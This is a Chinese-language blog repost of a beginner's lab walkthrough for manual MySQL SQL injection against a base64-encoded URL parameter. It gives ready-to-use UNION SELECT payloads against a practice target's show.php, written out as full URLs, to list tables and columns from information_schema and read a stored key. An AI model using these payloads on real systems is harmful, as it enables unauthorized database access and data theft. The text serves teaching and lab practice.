首页 » 网站推广 » phpsql手工注入技巧_入门实战 mysql的手工注入步骤的具体讲解

phpsql手工注入技巧_入门实战 mysql的手工注入步骤的具体讲解

duote123 2024-11-10 0

扫一扫用手机浏览

文章目录 [+]

首先从我实验的靶场可以看到该URL中存在一个参数,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密。

创造解密之后的参数为1,这种类型的注入除了和我们以前的普通注入比较只是多了一个“base64”加密的过程,下面进行手工注入演示:

phpsql手工注入技巧_入门实战 mysql的手工注入步骤的具体讲解

1、判断是否可以注入:

phpsql手工注入技巧_入门实战 mysql的手工注入步骤的具体讲解
(图片来自网络侵删)

and 测试;

由上判断可以得知存在SQL注入。

2、猜解字段长度

order by 2

order by 3

可以猜到字段长度为2。

3、爆数据库名、数据库版本信息

4、爆表名

http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

5、爆字段名

http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

6、爆字段值

http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--

至此得到末了的内容!

转载:https://blog.csdn.net/fly_hps/article/details/80208384

标签:

相关文章

介绍直播新纪元,轻松进入直播的五大步骤

介绍直播新纪元,轻松进入直播的五大步骤

随着互联网技术的飞速发展,直播行业在我国逐渐崛起,越来越多的人选择通过直播这一新兴媒介展示自己、分享生活、传递价值。对于许多新手来...

网站推广 2025-01-03 阅读1 评论0
介绍相机美颜原理,科技与美学的完美结合

介绍相机美颜原理,科技与美学的完美结合

随着科技的发展,智能手机的摄像头功能日益强大,美颜相机成为了许多人拍照的首选。美颜相机不仅满足了人们对于美的追求,更在视觉上给人带...

网站推广 2025-01-03 阅读1 评论0
介绍磁铁的制造,科学与艺术的完美结合

介绍磁铁的制造,科学与艺术的完美结合

磁铁,一种神秘的物质,自古以来就吸引了无数人的目光。它不仅具有独特的磁性,还能在工业、医疗、科研等领域发挥重要作用。磁铁是如何制造...

网站推广 2025-01-03 阅读1 评论0
介绍电瓶激活方法,让电池焕发新生

介绍电瓶激活方法,让电池焕发新生

随着科技的不断发展,电动汽车逐渐成为人们出行的首选。而电瓶作为电动汽车的核心部件,其性能直接影响着车辆的续航里程和行驶体验。新购买...

网站推广 2025-01-03 阅读1 评论0
«    2025年1月    »
12345
6789101112
13141516171819
20212223242526
2728293031